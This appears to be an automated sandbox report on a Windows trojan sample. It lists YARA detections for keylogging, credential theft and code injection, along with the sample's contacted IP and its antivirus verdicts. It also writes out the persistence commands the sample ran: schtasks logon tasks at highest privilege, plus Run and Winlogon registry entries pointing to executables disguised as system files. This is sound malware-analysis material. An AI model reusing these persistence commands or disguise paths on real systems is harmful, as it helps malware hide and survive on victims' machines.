{u'size_of_data': u'0x00398e00', u'virtual_address': u'0x00002000', u'entropy': 6.936161954945679, u'name': u'.rdata', u'virtual_size': u'0x00398d01'}

entropy

6.93616195495

description

A section with a high entropy has been found

entropy

0.999050718742

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 13, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 13, 2021, 6:06 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 13, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 13, 2021, 6:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (30 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	chcp 65001
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit

Communicates with host for which no DNS query was performed (1 event)

host

62.109.1.30

Installs itself for autorun at Windows startup (42 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\Config.Msi\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\Config.Msi\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\PerfLogs\Admin\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\PerfLogs\Admin\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskeng	reg_value	"C:\Windows\System32\mfc140chs\taskeng.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng	reg_value	"C:\Windows\System32\mfc140chs\taskeng.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\d3d11\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\d3d11\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lsm	reg_value	"C:\PerfLogs\Admin\lsm.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm	reg_value	"C:\PerfLogs\Admin\lsm.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wininit	reg_value	"C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit	reg_value	"C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SearchIndexer	reg_value	"C:\Windows\System32\ncpa\SearchIndexer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchIndexer	reg_value	"C:\Windows\System32\ncpa\SearchIndexer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\Windows\System32\KBDHEPT\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\Windows\System32\KBDHEPT\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe", "C:\Windows\System32\newdev\taskeng.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskeng	reg_value	"C:\Windows\System32\newdev\taskeng.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng	reg_value	"C:\Windows\System32\newdev\taskeng.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe", "C:\Windows\System32\newdev\taskeng.exe", "C:\Windows\System32\rdpclip\wininit.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wininit	reg_value	"C:\Windows\System32\rdpclip\wininit.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit	reg_value	"C:\Windows\System32\rdpclip\wininit.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe", "C:\Windows\System32\newdev\taskeng.exe", "C:\Windows\System32\rdpclip\wininit.exe", "C:\Program Files (x86)\Java\jre1.8.0_131\lib\fonts\taskhost.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Program Files (x86)\Java\jre1.8.0_131\lib\fonts\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Program Files (x86)\Java\jre1.8.0_131\lib\fonts\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe", "C:\Windows\System32\newdev\taskeng.exe", "C:\Windows\System32\rdpclip\wininit.exe", "C:\Program Files (x86)\Java\jre1.8.0_131\lib\fonts\taskhost.exe", "C:\Windows\System32\DeviceEject\taskhost.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Windows\System32\DeviceEject\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Windows\System32\DeviceEject\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Config.Msi\sppsvc.exe", "C:\PerfLogs\Admin\sppsvc.exe", "C:\Windows\System32\mfc140chs\taskeng.exe", "C:\Windows\System32\d3d11\spoolsv.exe", "C:\PerfLogs\Admin\lsm.exe", "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\wininit.exe", "C:\Windows\System32\ncpa\SearchIndexer.exe", "C:\Windows\System32\KBDHEPT\sppsvc.exe", "C:\Windows\System32\newdev\taskeng.exe", "C:\Windows\System32\rdpclip\wininit.exe", "C:\Program Files (x86)\Java\jre1.8.0_131\lib\fonts\taskhost.exe", "C:\Windows\System32\DeviceEject\taskhost.exe", "C:\Windows\System32\diagperf\services.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\services	reg_value	"C:\Windows\System32\diagperf\services.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services	reg_value	"C:\Windows\System32\diagperf\services.exe"
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2572 resumed a thread in remote process 2744
NtResumeThread Sept. 13, 2021, 6:07 p.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2744	1	0	0

Generates some ICMP traffic

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.FakeAlert.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.FakeAlert.2
McAfee	Artemis!3C4359296C65
Cylance	Unsafe
K7AntiVirus	Trojan ( 005821cd1 )
BitDefender	Gen:Variant.FakeAlert.2
K7GW	Trojan ( 005821cd1 )
Arcabit	Trojan.FakeAlert.2
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDropper.Agent.SON
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Backdoor.MSIL.LightStone.ecu
Avast	FileRepMalware
Rising	Trojan.Generic@ML.91 (RDML:l1/F0ARTZ0bH0HjhIj0r7A)
Ad-Aware	Gen:Variant.FakeAlert.2
Emsisoft	Gen:Variant.FakeAlert.2 (B)
F-Secure	Trojan.TR/Crypt.ZPACK.Gen
McAfee-GW-Edition	BehavesLike.Win32.VirRansom.wh
FireEye	Generic.mg.3c4359296c65223a
Sophos	Mal/Generic-S
Webroot	W32.Malware.Gen
Avira	TR/Crypt.ZPACK.Gen
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	Backdoor.MSIL.LightStone.ecu
GData	Gen:Variant.FakeAlert.2
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R441007
BitDefenderTheta	AI:Packer.43DB54281F
ALYac	Gen:Variant.FakeAlert.2
MAX	malware (ai score=84)
VBA32	BScope.Trojan.Nitol
Fortinet	W32/Tiny.NFR!tr
AVG	FileRepMalware

Stub.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All